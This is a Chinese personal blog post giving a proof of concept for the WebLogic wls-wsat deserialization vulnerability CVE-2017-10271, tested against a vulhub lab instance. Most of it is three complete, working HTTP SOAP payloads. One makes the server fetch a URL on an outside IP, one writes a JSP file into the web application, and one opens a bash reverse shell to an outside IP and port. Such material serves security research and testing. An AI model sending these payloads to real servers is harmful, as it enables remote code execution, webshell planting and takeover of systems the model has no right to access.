Reber's Blog

只会一点点编程、只会一点点渗透


WebLogic 反序列化漏洞 POC (CVE-2017-10271)

0x00 WebLogic WLS 组件反序列化漏洞

这个漏洞的编号是 CVE-2017-10271,漏洞存在于 Oracle WebLogic 的 wls-wsat 组件中,该组件的 XMLDecoder 方法在反序列化时存在漏洞可远程代码执行,凡是版本号 < 10.3.6 的都受到影响,刚出来时没有看,现在记录一下

漏洞环境:https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271

0x01 访问远程文件

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 127.0.0.1:7001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=DJbghZRGlJf0PyyLc52n4GdvrbDkrxKWGDpwnncFpHnqsDjMT68F!-298356074
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 688
Content-Type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java version="1.8" class="java.beans.XMLDecoder">
                <object id="url" class="java.net.URL">
                    <string>http://114.115.123.123:80/aaaaaaa</string>
                </object>
                <object idref="url">
                    <void id="stream" method = "openStream" />
                </object>
            </java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

0x02 写入文件

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 127.0.0.1:7001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=DJbghZRGlJf0PyyLc52n4GdvrbDkrxKWGDpwnncFpHnqsDjMT68F!-298356074
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 688
Content-Type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java version="1.8.0" class="java.beans.XMLDecoder">
                <object class="java.io.PrintWriter"> 
                    <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/cert.jsp</string>
                    <void method="println"><string>&lt;% out.print("ccccc"); %&gt;</string></void>
                    <void method="close"/>
                </object>
            </java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

然后访问:http://127.0.0.1:7001/wls-wsat/cert.jsp 即可

0x03 执行命令

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 127.0.0.1:7001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=DJbghZRGlJf0PyyLc52n4GdvrbDkrxKWGDpwnncFpHnqsDjMT68F!-298356074
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 803
Content-Type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java>
                <object class="java.lang.ProcessBuilder">
                    <array class="java.lang.String" length="3" >
                        <void index="0"><string>/bin/bash</string></void>
                        <void index="1"><string>-c</string></void>
                        <void index="2"><string><![CDATA[bash -i >& /dev/tcp/114.115.123.123/8888 0>&1]]></string></void>
                    </array>
                    <void method="start"/>
                </object>
            </java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

CVE-2017-10271执行命令实例

Reference(侵删):